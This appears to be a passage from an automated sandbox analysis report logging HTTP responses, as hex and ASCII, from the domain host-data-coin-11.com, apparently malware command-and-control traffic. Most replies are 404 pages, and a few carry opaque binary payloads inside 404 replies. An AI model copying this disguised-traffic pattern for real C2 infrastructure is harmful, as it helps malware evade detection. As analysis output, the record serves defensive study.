                              Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected:
                              HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Fri, 14 Jan 2022 11:29:29 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global traffic | HTTP traffic detected:
                              HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Fri, 14 Jan 2022 11:29:29 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Data Raw: 36 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 51 da 44 d0 f8 20 8c 21 ea ad 96 56 2c e4 b4 48 2b e3 b3 b6 68 f3 9a b9 59 a8 77 9f cb 31 41 5b 3d 03 4b de bb 4b bb ff 5b 91 ad d3 02 c4 60 9d d2 69 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 66I:82OB%,YR("XQD !V,H+hYw1A[=KK[`i0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:29:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
